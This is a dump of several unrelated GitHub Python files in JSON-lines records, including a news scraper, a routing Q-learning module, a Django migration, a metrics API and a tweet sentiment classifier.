self.newspaper.replace('\\n','')\n self.newspaper = self.newspaper.replace('\"', '')\n self.newspaper = self.newspaper.replace(\"'\", '')\n except:\n self.newspaper = ''\n\n try:\n self.title = self.html_content.find('div', class_='n0jPhd ynAwRc MBeuO nDgy9d').text\n self.title = unidecode( self.title ) # Quito los acentos\n self.title = self.title.replace('\\n','')\n self.title = self.title.replace('\"', '')\n self.title = self.title.replace(\"'\", '')\n except:\n self.title = self.html_content.find('div', class_='n0jPhd ynAwRc tNxQIb nDgy9d').text\n\n try:\n self.antique = self.html_content.find('div', class_='OSrXXb rbYSKb LfVVr').text\n except:\n self.antique = self.html_content.find('div', class_='OSrXXb rbYSKb').text\n self.antique = unidecode( self.antique ) # Quito los acentos\n\n # Busco la URL de la noticia\n try:\n self.url = self.html_content.find('a').get('href')\n except:\n self.url = ''\n\n # Obtengo los datos de fecha\n self.get_google_date()\n\n def get_google_date(self):\n \"\"\" \"\"\"\n # Reemplazar meses\n self.antique = self.antique.replace('ene', 'jan')\n self.antique = self.antique.replace('abr', 'apr')\n self.antique = self.antique.replace('ago', 'aug')\n self.antique = self.antique.replace('sept', 'sep')\n self.antique = self.antique.replace('dic', 'dec')\n\n # Validar que la cadena de texto sea válida\n if 'hace' not in self.antique:\n date_obj = datetime.strptime(self.antique, \"%d %b %Y\")\n date = date_obj.strftime(\"%d-%m-%Y\")\n return f'{date} 12:00:00'\n\n # Obtener el número y la unidad de tiempo de la cadena\n cantidad, unidad = self.antique.split()[1:]\n cantidad = int(cantidad)\n\n # Obtener la fecha actual\n cdate = datetime.now()\n\n # Calcular la fecha de publicación restando la cantidad de tiempo adecuada\n if 'minuto' in unidad:\n date = cdate - timedelta(minutes=cantidad)\n elif 'hora' in unidad:\n date = cdate - timedelta(hours=cantidad)\n elif 'dia' in unidad:\n date = cdate - timedelta(days=cantidad)\n elif 'semana' in unidad:\n date = cdate - timedelta(days=cantidad * 7) # Suponiendo 30 días por mes\n elif 'mes' in unidad:\n date = cdate - timedelta(days=cantidad * 30) # Suponiendo 30 días por mes\n elif 'año' in unidad:\n date = cdate - timedelta(days=cantidad * 365) # Suponiendo 365 días por año\n\n self.publish_date = '{} {}'.format(\n date.date().strftime(\"%d-%m-%Y\"),\n date.time().strftime(\"%H:%M:%S.%f\")[:-7]\n )\n\nclass GoogleSearch:\n def __init__(self, topics=[], enable_MP=True, verbose=True):\n self.topics = topics\n self.enable_MP = enable_MP\n self.verbose = verbose\n self.news_dicc = {}\n self.news = []\n\n def fetch_news(self):\n \"\"\" \"\"\"\n #\n if self.topics == None:\n print('Se omitio la obtencion de noticias...')\n print('La lista de temas esta vacia')\n return {} # Devuelvo un diccionario vacio\n\n # Ejecuto el codigo en paralelo o serie\n if self.enable_MP is True:\n self.fetch_news_from_topic_MP()\n else:\n self.fetch_news_from_topic()\n\n return self.news_dicc\n\n def fetch_news_from_topic(self):\n \"\"\"Obtencion de noticias de la forma serie\"\"\"\n # Obtengo las noticias para cada tematica\n for topic in self.topics:\n self.fetch_topic_news(topic=topic)\n\n def fetch_news_from_topic_MP(self, version=1):\n \"\"\"Obtencion de noticias de la forma paralela\"\"\"\n # Defino el numero de threads que puede usar el procesador\n # UPor defecto voy a utilizar la mitad de los hilos\n # disponibles\n nthreads = max(1, os.cpu_count() // 2)\n\n ############################################################\n # Esta version espera que todos los procesos terminen\n # antes de continuar con la ejecucion del programa\n ############################################################\n if version == 1:\n # Creo una lista para almacenar los procesos\n threads = []\n\n # Completo el diccionario utilizando ThreadPoolExecutor\n with ThreadPoolExecutor(max_workers=nthreads) as executor:\n for topic in self.topics:\n thread = executor.submit(self.fetch_topic_news, topic)\n threads.append(thread)\n\n # Esperar a que todos los hilos finalicen\n for thread in threads:\n thread.result()\n\n ############################################################\n # Esta version NO espera que todos los procesos terminen\n # antes de continuar con la ejecucion del programa\n ############################################################\n elif version == 2:\n # Creo una lista para almacenar los procesos\n processes = []\n\n # Completo el diccionario utilizando Process\n for topic in self.topics:\n process = multiprocessing.Process(target=self.fetch_topic_news, args=(topic,))\n processes.append(process)\n process.start()\n\n # Esperar a que todos los procesos finalicen\n for process in processes:\n process.join()\n\n def fetch_topic_news(self, topic = 'Netflix'):\n \"\"\"Obtener las noticias mas relevantes en Google sobre un tema dado\"\"\"\n\n print('- Looking news for topic:', topic)\n\n # Reemplazo los espacios por signos + para ejecutar la busqueda\n rtopic = topic.replace(' ','+')\n\n # Defino la URL\n url = f'https://www.google.com/search?q={rtopic}&tbm=nws'\n\n # Respuesta del servidor\n response = getHTTPResponse(url, headers = None)\n\n # Obtengo las noticias\n # Intento primero obtener la noticia con el href incluido\n # Si no lo encuentro, busco otra division mas abajo\n html_news = response.find_all('div', class_=['CA8QAA','SoaBEf','xCURGd'])\n if html_news is None:\n html_news = response.find_all('div', class_=['iRPxbe','g5wfEd'])\n\n # Muestro las noticias\n for k, html_new in enumerate(html_news):\n new = GoogleNew(topic=topic)\n new.html_content = html_new\n new.fetch_data()\n\n # Agrego la noticia\n self.news.append( new )","repo_name":"santinieto/latinframe_soft","sub_path":"src/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":8065,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13897547382","text":"\nimport sys\ninp = input().split()\nn=int(inp[0])\nk=int(inp[1])\nlll=input().split()\nls=[int(i) for i in lll]\nfstore={}\nbstore={}\nsys.setrecursionlimit(3*n)\ndef forward(i):\n\tres=0\n\tif i==n-1:\n\t\treturn ls[n-1]\n\telif i==n-2:\n\t\treturn ls[n-2]+forward(i+1)\n\telif i in fstore:\n\t\tres=fstore[i]\n\telse:\n\t\tfstore[i]=max(ls[i]+forward(i+1),ls[i]+forward(i+2))\n\t\tres=fstore[i]\n\treturn res\ndef back(j):\n\tif j==0:\n\t\treturn ls[0]\n\telif j==1:\n\t\treturn ls[1]+back(j-1)\n\telif j in bstore:\n\t\treturn bstore[j]\n\telse:\n\t\tbstore[j]= max(ls[j]+back(j-1),ls[j]+back(j-2))\n\t\treturn bstore[j]\n\na=forward(k-1)-ls[k-1]\nb=back(n-1)-ls[n-1]\n# print('a:',a)\n# print('b:',b)\nprint(a+b)","repo_name":"Shubhamsharda/Competetive-Programming","sub_path":"calvin's game.py","file_name":"calvin's game.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"544527259","text":"import random\r\nfrom get_all_routes import get_best_nodes, get_route\r\n#from get_all_routes import get_best_nodes, get_best_net, get_all_best_routes, get_cost, count_routes, get_route\r\nimport numpy as np\r\n\r\ndef update_Q(T,Q,current_state, next_state, alpha):\r\n current_t = T[current_state][next_state]\r\n current_q = Q[current_state][next_state]\r\n \r\n #updating SARSA\r\n # best_next_action_val = min(Q[next_state].values())\r\n # for action in Q[next_state].keys():\r\n # if Q[next_state][action] == best_next_action_val:\r\n # best_next_action = action\r\n # # print(best_next_action)\r\n # new_q = current_q + alpha * (current_t + gamma * Q[next_state][best_next_action] - current_q) #for each state, it will choose the minimun furture cost instead of maximum future reward SARSA\r\n\r\n #updating Q-learning\r\n new_q = current_q + alpha * (current_t + min(Q[next_state].values()) - current_q) #for each state,\r\n #it will choose the minimun furture cost instead of maximum future reward.\r\n Q[current_state][next_state] = new_q\r\n return Q\r\n\r\ndef get_key_of_min_value(dic):\r\n min_val = min(dic.values())\r\n return [k for k, v in dic.items() if v == min_val]\r\n\r\ndef Q_routing(T,Q,alpha,epsilon,n_episodes,start,end): #Fill Q table and explore all options\r\n #--------------e-greedy decay---------------------------------\r\n # min_epsilon = 0.01\r\n # max_epsilon = 0.9\r\n # decay_rate = 0.001\r\n episode_hops = {}\r\n \r\n routes_complete = []\r\n for i in range(n_episodes):\r\n routes_complete.append([])\r\n\r\n #T is network info\r\n for e in range(1,n_episodes+1): #per ogni episodio\r\n # print(\"Episode {0}:\".format(e))\r\n current_state = start\r\n goal = False\r\n stored_states = []\r\n\t\r\n #print(\"Prima dell'update, episodio \", e, \"\\n\",Q)\r\n while not goal:\r\n #takes the next hops neighbours for state\r\n valid_moves = list(Q[current_state].keys())\r\n \r\n if len(valid_moves) <= 1: #se c'è solo un neighbour il prossimo stato è per forza quello\r\n next_state = valid_moves[0]\r\n else:\r\n #scegli la best action tra quelle che in questo stato minimizzano il Q value\r\n best_action = random.choice(get_key_of_min_value(Q[current_state]))\r\n if random.random() < epsilon:\r\n next_state = best_action\r\n else:\r\n valid_moves.pop(valid_moves.index(best_action)) #togli da valid moves quella che ha come indice la best \r\n \t\t\t\t\t#action scelta a caso prima tra quelle col minor Q value\r\n next_state = random.choice(valid_moves) #scegli a caso tra quelle rimanenti tra le mosse valide\r\n Q = update_Q(T,Q,current_state, next_state, alpha) #update Q Table\r\n current_state = next_state\r\n # print(next_state)\r\n stored_states.append(next_state)\r\n\r\n if next_state in end:\r\n goal = True\r\n \r\n \r\n ##QUI DEVO STAMPARE LA REWARD DI FINE EPISODIO PER UNA COPPIA SRC/DST\r\n \r\n #print(\"Dopo l'update, episodio \",e,\"\\n\", Q)\r\n nodes = get_best_nodes(Q,start,end) #get best nodes to reach dest\r\n route = get_route(Q, start, end)\r\n \r\n routes_complete[e-1] = route\r\n \r\n #print(\"\\nepisodio: \", e, \" \", route) \r\n \r\n \r\n \t\r\n \r\n \r\n # print('Q-table:', Q)\r\n # print('Switches', stored_states)\r\n # episode_hops[e] = stored_states\r\n # print('resume',episode_hops)\r\n # name = '~/ryu/ryu/SDNapps_proac/RoutingGeant/stretch/Graphs_parameters/alpha_'+str(alpha)+'/'+str(it)+'_alpha_'+str(alpha)+'_epsilon_'+str(epsilon)+'_'\r\n\r\n # with open(str(name)+'hops_episodes.json', 'w') as json_file:\r\n # json.dump(episode_hops, json_file, indent=1)\r\n \r\n #--------------e-greedy decay---------------------------------\r\n # e += 1\r\n # epsilon = min_epsilon + (max_epsilon - min_epsilon)*np.exp(-decay_rate*e)\r\n # print epsilon\r\n return Q, epsilon, routes_complete\r\n","repo_name":"gabrispa/controllerML","sub_path":"RoutingGeant/Q_routing.py","file_name":"Q_routing.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9921904881","text":"from pip import List\n\n\ndef containsDuplicate(self, nums: List[int]) -> bool:\n hash = {}\n for i in range(len(nums)):\n if nums[i] in hash:\n hash[nums[i]] += 1\n else:\n hash[nums[i]] = 1\n if hash[nums[i]] > 1:\n return True\n return False\n\n\nnums = [2, 2, 11, 15]\nans = containsDuplicate(0, nums)\nprint(ans)\n","repo_name":"baszabilsal/LeetCode_DataStructureAndAlgorithm","sub_path":"DataStructure/217_containsDuplicate/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29583324802","text":"import apps.models\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"log_search\", \"0032_featuretoggle\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"IndexSetTag\",\n fields=[\n (\"tag_id\", models.AutoField(primary_key=True, serialize=False, verbose_name=\"标签id\")),\n (\"name\", models.CharField(max_length=255, unique=True, verbose_name=\"标签名称\")),\n (\n \"color\",\n models.CharField(\n choices=[\n (\"red\", \"red\"),\n (\"yellow\", \"yellow\"),\n (\"blue\", \"blue\"),\n (\"green\", \"green\"),\n (\"gray\", \"gray\"),\n ],\n default=\"green\",\n max_length=255,\n verbose_name=\"配色\",\n ),\n ),\n ],\n options={\n \"verbose_name\": \"标签表\",\n \"verbose_name_plural\": \"标签表\",\n },\n ),\n migrations.AddField(\n model_name=\"logindexset\",\n name=\"tag_ids\",\n field=apps.models.MultiStrSplitByCommaField(default=\"\", max_length=255, verbose_name=\"标签id记录\"),\n ),\n migrations.CreateModel(\n name=\"IndexSetUserFavorite\",\n fields=[\n (\"id\", models.AutoField(primary_key=True, serialize=False, verbose_name=\"id\")),\n (\"index_set_id\", models.IntegerField(verbose_name=\"索引集id\")),\n (\"username\", models.CharField(max_length=255, verbose_name=\"用户name\")),\n ],\n options={\n \"verbose_name\": \"检索收藏记录\",\n \"verbose_name_plural\": \"33_搜索-检索收藏记录\",\n \"unique_together\": {(\"index_set_id\", \"username\")},\n },\n ),\n ]\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_search/migrations/0033_auto_20210528_1655.py","file_name":"0033_auto_20210528_1655.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"20048894122","text":"import os\nimport sys\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import svm\nfrom sklearn import metrics\nimport pickle\n\nif len(sys.argv) < 2:\n print(\"no input csv file\")\n exit(0)\n\n\n\ndf = pd.read_csv(sys.argv[1])\n\n# print(df, df.columns[0:len(df.columns)])\n\nxcols = [ i for i in df.columns]\ntarg = xcols.pop()\n# print(xcols)\nX = df.loc[:,xcols ].values\nprint(X.shape)\nY = df.loc[:,targ].values\nprint(Y.shape)\n\nX = StandardScaler().fit_transform(X)\nprint(X)\n# pca = PCA(n_components=128)\n# pcaofX = pca.fit_transform(X)\n# print(\"shapeofX after pca\",pcaofX.shape, \", cum Sum of variance ratio\",pca.explained_variance_ratio_.cumsum()[-1])\n\npcaofX = X\n\nX_train, X_test, Y_train, Y_test = train_test_split(pcaofX, Y, test_size=0.1,random_state=109)\n\nprint(X_train.shape)\n\nsvm_model = svm.SVC(kernel=\"linear\")\nsvm_model.fit(X_train,Y_train)\n\npred = svm_model.predict(X_test)\nprint(pred)\n\nprint(\"Accuracy:\",metrics.accuracy_score(Y_test, pred))\n\n\npickle.dump(svm_model, open(\"svm_model.sav\", 'wb'))\n\n","repo_name":"jha11aditya/facial_recognition","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35269019092","text":"import functools\nimport base64\n\nfrom urlparse import parse_qs as _parse_qs\n\nfrom twisted.internet.defer import maybeDeferred, inlineCallbacks\n\nfrom confmodel import Config\nfrom confmodel.fields import ConfigDict\n\nfrom go_api.cyclone.handlers import ApiApplication, BaseHandler\nfrom cyclone.web import HTTPAuthenticationRequired\n\nfrom go_metrics.metrics.base import MetricsBackendError, BadMetricsQueryError\nfrom go_metrics.metrics.graphite import GraphiteBackend\n\n\ndef parse_qs(qs):\n return dict(\n (k, v[0] if len(v) == 1 else v)\n for (k, v) in _parse_qs(qs).iteritems())\n\n\ndef HTTPBasic(method):\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n backend = self.model.backend\n config = backend.config\n if not (getattr(config, 'basicauth_username', None) and\n getattr(config, 'basicauth_password', None)):\n return method(self, *args, **kwargs)\n\n msg = \"Authentication Required\"\n if \"Authorization\" in self.request.headers:\n try:\n auth_type, data = self.request.headers[\"Authorization\"].split()\n if auth_type == \"Basic\":\n usr, pwd = base64.b64decode(data).split(\":\", 1)\n if (usr == config.basicauth_username and\n pwd == config.basicauth_password):\n self._current_user = usr\n return method(self, *args, **kwargs)\n msg = \"Authentication Failed\"\n except (ValueError, TypeError):\n # NOTE: ValueError for when the split() doesn't work\n # TypeError for when the data isn't base64 decodeable\n msg = \"Invalid Authorization header\"\n\n raise HTTPAuthenticationRequired(\n log_message=msg, auth_type=\"Basic\", realm=\"Metrics API\")\n\n return wrapper\n\n\nclass MetricsHandler(BaseHandler):\n\n @HTTPBasic\n def get(self):\n query = parse_qs(self.request.query)\n d = maybeDeferred(self.model.get, **query)\n d.addCallback(self.write_object)\n d.addErrback(self.catch_err, 400, BadMetricsQueryError)\n d.addErrback(self.catch_err, 500, MetricsBackendError)\n d.addErrback(self.raise_err, 500, \"Failed to retrieve metrics.\")\n return d\n\n def _assert_dict(self, d):\n if not isinstance(d, dict):\n raise BadMetricsQueryError(\n \"Invalid query %r, should be dict, not %s\" % (d, type(d)))\n\n @HTTPBasic\n def post(self):\n data = self.parse_json(self.request.body)\n d = maybeDeferred(self._assert_dict, data)\n d.addCallback(lambda _: self.model.fire(**data))\n d.addCallback(self.write_object)\n d.addErrback(self.catch_err, 400, BadMetricsQueryError)\n d.addErrback(self.raise_err, 500, \"Failed to fire metrics.\")\n return d\n\n\nclass MetricsApiConfig(Config):\n backend = ConfigDict(\"Config for metrics backend\", default={})\n\n\nclass MetricsApi(ApiApplication):\n config_required = True\n backend_class = GraphiteBackend\n\n @property\n def models(self):\n return (('/metrics/', MetricsHandler, self.get_metrics_model),)\n\n def initialize(self, settings, config):\n config = MetricsApiConfig(config)\n self.backend = self.backend_class(config.backend)\n\n @inlineCallbacks\n def teardown(self):\n yield self.backend.teardown()\n\n def get_metrics_model(self, owner_id):\n return self.backend.get_model(owner_id)\n","repo_name":"praekelt/go-metrics-api","sub_path":"go_metrics/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42725707164","text":"\nopcion=\"\";cantidad=0\nhinchas=[]\nwhile opcion !=\"0\":\n respuesta=\"S\"\n print(\"[1] Ingresar hincha\\n[2] Ver listado\\n[0] Salir\")\n opcion=input(\"Ingrese la opción: \")\n if opcion ==\"1\":\n while respuesta.upper() ==\"SI\" or respuesta.upper() ==\"S\":\n rut=input(\"Ingrese el rut: \")\n ingreso=input(\"Permite el ingreso del hincha: [SI] o [NO]\")\n if ingreso.upper() ==\"SI\" or ingreso.upper() ==\"S\":\n if rut in hinchas: \n print(\"\\n\\n*******************\\n La persona ya ingreso \\n*******************\\n\") \n else:\n cantidad+=1\n hinchas.append(rut)\n print(\"Ingresado\")\n else: \n print(\"ACCESO DENEGADO!!!\")\n input(\"\")\n respuesta=input(\"\\nDesea ingresar otro hincha [SI] o [NO]: \")\n elif opcion ==\"2\":\n print(\"Listado de hinchas que ingresaron\")\n for hincha in hinchas:\n print(hincha)\n input(\"\")\n elif opcion ==\"\" or opcion.isalpha()==True or int(opcion) < 0 or int(opcion) >= 3:\n print(\"Opcion elegida no es valida\")\n input(\"Presione cualquier tecla para continuar.....\\n\")\n else:\n print(\"Hasta Pronto!!!\")","repo_name":"Tanner1983/Modulo2-Actividades-10-18","sub_path":"act14-03.py","file_name":"act14-03.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20429862747","text":"class Solution:\n def containsNearbyDuplicate(self, nums: List[int], k: int) -> bool:\n if len(set(nums))==len(nums): return False \n for i in range(len(nums)-k+2):\n window = nums[i:i+k+1]\n if len(set(window))\r\n#-------------------------------------------------------------------------------\r\nimport pandas as pd\r\nimport csv\r\nimport re\r\nimport nltk\r\nimport networkx as nx\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import PorterStemmer as PS\r\nimport numpy as np\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import OrdinalEncoder\r\nimport operator\r\nimport math\r\nimport preprocessor as p\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.feature_selection import SelectKBest\r\nfrom sklearn.preprocessing import normalize\r\nfrom sklearn.feature_selection import chi2\r\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\r\nimport pandas as pd\r\n\r\ntopnum=30\r\n# prepare input data\r\ndef prepare_inputs(X_train, X_test):\r\n\toe = OrdinalEncoder()\r\n\toe.fit(X_train)\r\n\tX_train_enc = oe.transform(X_train)\r\n\tX_test_enc = oe.transform(X_test)\r\n\treturn X_train_enc, X_test_enc\r\n\r\n#prepare targets\r\ndef prepare_targets(y_train, y_test):\r\n\tle = LabelEncoder()\r\n\tle.fit(y_train)\r\n\ty_train_enc = le.transform(y_train)\r\n\ty_test_enc = le.transform(y_test)\r\n\treturn y_train_enc, y_test_enc\r\n\r\ndef select_features(X_train, y_train, X_test):\r\n\r\n\tfs = SelectKBest(score_func=chi2, k=500)\r\n\tfs.fit(X_train, y_train)\r\n\tX_train_fs = fs.transform(X_train)\r\n\tX_test_fs = fs.transform(X_test)\r\n\r\n\treturn X_train_fs, X_test_fs, fs\r\n\r\n\r\ndef do_transform(X_test, all_features):\r\n print(type(X_test))\r\n df = pd.DataFrame(columns=all_features.keys())\r\n print(df)\r\n\r\n features_setoftweets=[]\r\n for anything in X_test:\r\n listofwords=anything.split()\r\n each_tweet_1=anything.split()\r\n\r\n for i in range(0, len(each_tweet_1)-1):\r\n listofwords.append(str(each_tweet_1[i]+' '+ each_tweet_1[i+1]))\r\n features_setoftweets.append(listofwords)\r\n\r\n\r\n\r\n full_featureset=[]\r\n for each_feature in features_setoftweets:\r\n everytweet_featureset=dict()\r\n for each_word in each_feature:\r\n\r\n temp_each_word=each_word.split()\r\n\r\n if len(temp_each_word)==1:\r\n try:\r\n everytweet_featureset[each_word]=all_features[each_word]\r\n except:\r\n continue\r\n if len(temp_each_word)==2:\r\n\r\n try:\r\n everytweet_featureset[each_word]=all_features[str(each_word)]\r\n except:\r\n continue\r\n\r\n df=df.append(everytweet_featureset, ignore_index=True)\r\n full_featureset.append(everytweet_featureset)\r\n\r\n df=df.replace(np.nan, 0)\r\n num_array= df.to_numpy()\r\n\r\n normed_matrix = normalize(num_array)\r\n\r\n return normed_matrix\r\n\r\ndef getnewst(setoftweets):\r\n\r\n edges=dict()\r\n for each_tweet in setoftweets:\r\n each_tweet=each_tweet.split()\r\n\r\n for i in range(0, len(each_tweet)-1):\r\n if (each_tweet[i], each_tweet[i+1]) in edges.keys():\r\n edges[(each_tweet[i], each_tweet[i+1])]= edges[(each_tweet[i], each_tweet[i+1])]+1\r\n\r\n else:\r\n edges[(each_tweet[i], each_tweet[i+1])]=1\r\n\r\n\r\n G=nx.Graph()\r\n for (u,v),w in edges.items():\r\n G.add_edge(u,v,weight=w)\r\n\r\n\r\n\r\n newresults_S=dict(G.degree(weight='weight'))\r\n newresults_k=dict(G.degree())\r\n clust=nx.clustering(G)\r\n selectivity_dict=dict()\r\n for each_node in G.nodes():\r\n selectivity_dict[each_node]=(float)((float)(newresults_S[each_node])/(float)(newresults_k[each_node]))*(math.log(newresults_k[each_node]))\r\n\r\n edge_score=dict()\r\n for (u,v) in G.edges():\r\n try:\r\n ew=edges[(u,v)]\r\n except:\r\n ew=edges[(v,u)]\r\n es=(float)((float)(ew)/(float)(G.degree(u)+G.degree(v)-ew))\r\n\r\n edge_score[(u,v)]=(float)(math.log(ew)*(float)(es))\r\n\r\n results_unigram = sorted(selectivity_dict.items(),key=operator.itemgetter(1),reverse=True)\r\n results_bigram = sorted(edge_score.items(),key=operator.itemgetter(1),reverse=True)\r\n\r\n\r\n feature_value_uni=dict()\r\n for each_unigram in selectivity_dict.keys():\r\n if selectivity_dict[each_unigram]>1:\r\n feature_value_uni[each_unigram]=selectivity_dict[each_unigram]\r\n\r\n print(type(feature_value_uni))\r\n\r\n max_val=max(feature_value_uni.values())\r\n\r\n feature_dict=dict()\r\n for k,v in feature_value_uni.items():\r\n feature_dict[k]=(float)(((float)(v))/(max_val))\r\n\r\n feature_value_uni=feature_dict\r\n\r\n feature_value_bi=dict()\r\n for (u,v) in edge_score.keys():\r\n if edge_score[(u,v)]>0.0:\r\n bigram_str=str(u+' '+v)\r\n feature_value_bi[bigram_str]=edge_score[(u,v)]\r\n\r\n max_val=max(feature_value_bi.values())\r\n\r\n feature_dict=dict()\r\n for k,v in feature_value_uni.items():\r\n feature_dict[k]=(float)(((float)(v))/(max_val))\r\n\r\n feature_value_bi=feature_dict\r\n\r\n all_features=dict()\r\n for k,v in feature_value_uni.items():\r\n all_features[k]=str(v)\r\n\r\n for k,v in feature_value_bi.items():\r\n all_features[k]=str(v)\r\n\r\n df = pd.DataFrame(columns=all_features.keys())\r\n print(df)\r\n\r\n features_setoftweets=[]\r\n for anything in setoftweets:\r\n listofwords=anything.split()\r\n each_tweet_1=anything.split()\r\n\r\n for i in range(0, len(each_tweet_1)-1):\r\n listofwords.append(str(each_tweet_1[i]+' '+ each_tweet_1[i+1]))\r\n features_setoftweets.append(listofwords)\r\n\r\n\r\n\r\n full_featureset=[]\r\n for each_feature in features_setoftweets:\r\n everytweet_featureset=dict()\r\n for each_word in each_feature:\r\n\r\n temp_each_word=each_word.split()\r\n\r\n if len(temp_each_word)==1:\r\n try:\r\n everytweet_featureset[each_word]=feature_value_uni[each_word]\r\n except:\r\n continue\r\n if len(temp_each_word)==2:\r\n\r\n try:\r\n everytweet_featureset[each_word]=feature_value_bi[str(each_word)]\r\n except:\r\n continue\r\n\r\n df=df.append(everytweet_featureset, ignore_index=True)\r\n\r\n full_featureset.append(everytweet_featureset)\r\n\r\n df=df.replace(np.nan, 0)\r\n num_array= df.to_numpy()\r\n\r\n normed_matrix = normalize(num_array)\r\n\r\n print(normed_matrix)\r\n\r\n return normed_matrix, all_features\r\ndef main():\r\n pass\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\nTweetID_file=pd.read_csv('amazon_cells_labelled.txt', sep=\"\\t\", header=None, names=['text','category'])\r\n\r\n\r\ncorpus=pd.DataFrame(TweetID_file,columns= ['text','category'])\r\n\r\n\r\nX_array=list(corpus['text'])\r\nY_array=list(corpus['category'])\r\n\r\n\r\nsetoftweets=[]\r\n\r\nmaintain_sentiments_dict=dict()\r\nstopwords_english = stopwords.words('English')\r\ntotal=len(corpus['text'])\r\nporter=PS()\r\n\r\n\r\nfor j in range(0,total):\r\n each_element=str(corpus['text'][j])\r\n\r\n temp_processed_tweet=each_element.split()\r\n tweets_clean=[]\r\n result=list(nltk.pos_tag(temp_processed_tweet))\r\n\r\n for (eachword,val) in result:\r\n # if( val == 'VB' or val=='ADJ' or val == 'ADV'):\r\n # eachword=porter.stem(eachword)\r\n eachword=eachword.lower()\r\n eachword=eachword.replace(\".\", \" \")\r\n eachword=eachword.replace(\"!\", \" \")\r\n eachword=eachword.replace(\",\", \" \")\r\n eachword=eachword.replace(\"-\", \" \")\r\n\r\n if (eachword not in stopwords_english): # remove stopwords\r\n\r\n tweets_clean.append(eachword)\r\n string = ' '.join(tweets_clean)\r\n setoftweets.append(string)\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(setoftweets, Y_array, test_size = 0.25, random_state=42)\r\n\r\n\r\nX_train, all_features=getnewst(X_train)\r\n\r\nX_test=do_transform(X_test, all_features)\r\nprint(abc1)\r\n\r\n\r\n##X_array=list(setoftweets)\r\n##\r\n##\r\n###tfidf = TfidfVectorizer(min_df=2, max_df=0.5, ngram_range=(1, 2))\r\n##tfidf = CountVectorizer(min_df=2, max_df=0.5, ngram_range=(1, 2))\r\n##X_train = tfidf.fit_transform(X_train)\r\n##\r\n##\r\n##\r\n##df=pd.DataFrame(\r\n## X_train.todense(),\r\n## columns=tfidf.get_feature_names()\r\n##)\r\n##\r\n##\r\n##X_test=tfidf.transform(X_test)\r\n##\r\n###X_train_enc, X_test_enc = X_train, X_test\r\n### prepare output data\r\n##y_train_enc, y_test_enc = prepare_targets(y_train, y_test)\r\n##\r\n##\r\n### feature selection\r\n##X_train_fs, X_test_fs, fs = select_features(X_train, y_train, X_test)\r\n##\r\n\r\nlogreg = LogisticRegression(C=1)\r\nlogreg.fit(X_train, y_train)\r\n\r\nprint (\"Accuracy is %s\" % ( accuracy_score(y_test, logreg.predict(X_test))))\r\n\r\nY_predict=logreg.predict(X_test)\r\nget_confusion_matrix=confusion_matrix(y_test, Y_predict, labels=[0,1])\r\nprint(get_confusion_matrix)\r\n\r\ntarget=[0,1]\r\nprint(classification_report(y_test, Y_predict))","repo_name":"drmuskangarg/UBIS","sub_path":"GowVectorizer.py","file_name":"GowVectorizer.py","file_ext":"py","file_size_in_byte":9115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12880657443","text":"maxKey = 30\nimport numpy as np\nimport bentuk\nfrom random import randint\nfrom transformasi import rotasi,rotasiY,dilate\n# Setting program\nclass config:\n # Static Variable\n # Ukuran GUI\n width, height = 1000, 1000\n #Program jalan\n jalan = True\n # nilai koordinat minimal X,Y,Z\n minX, maxX = -int(width/2), int(width/2)\n minY, maxY = minX, maxX\n minZ, maxZ = minX, maxX\n # 2D / 3D\n is3D = True\n # Nilai awal orthogonal\n curMinX, curMaxX, curMinY, curMaxY, curMinZ, curMaxZ = -10, 10, -10, 10, -10, 10\n # Nilai camera\n camX2D, camY2D,camZ2D = 0.0,0.0,5.0\n camX3D, camY3D, camZ3D = 5.0,5.0,5.0\n # Vector Camera\n vecCam3D = np.mat([[camX3D,camY3D,camZ3D,1]])\n #TegakLurus = Proyeksi Vector Cam lalu diputar 90 derajat counterclockwise\n tegakLurusCam3D = np.mat([[camX3D,0,camZ3D,1]]) * rotasiY(90)\n # Nilai warna grid\n xy, xz,yz = [[255 for i in range(3)] for i in range(3)]#[[randint(0,255)/255 for color in range(3)] for i in range(3)]\n # Ukuran grid\n banyakGrid = 40\n # Navigasi\n navX, navY, navZ, navZoom = 1, 1, 1, 1.1\n navPutar = 5\n #Animasi\n maxKeyFrame = maxKey\n #Default Object\n objTest = bentuk.objek(is3D)\n listOfVertex = []\n default = True\n def initAwal(is3D,listOfVertex=[],default=True):\n config.is3D = is3D\n config.listOfVertex = 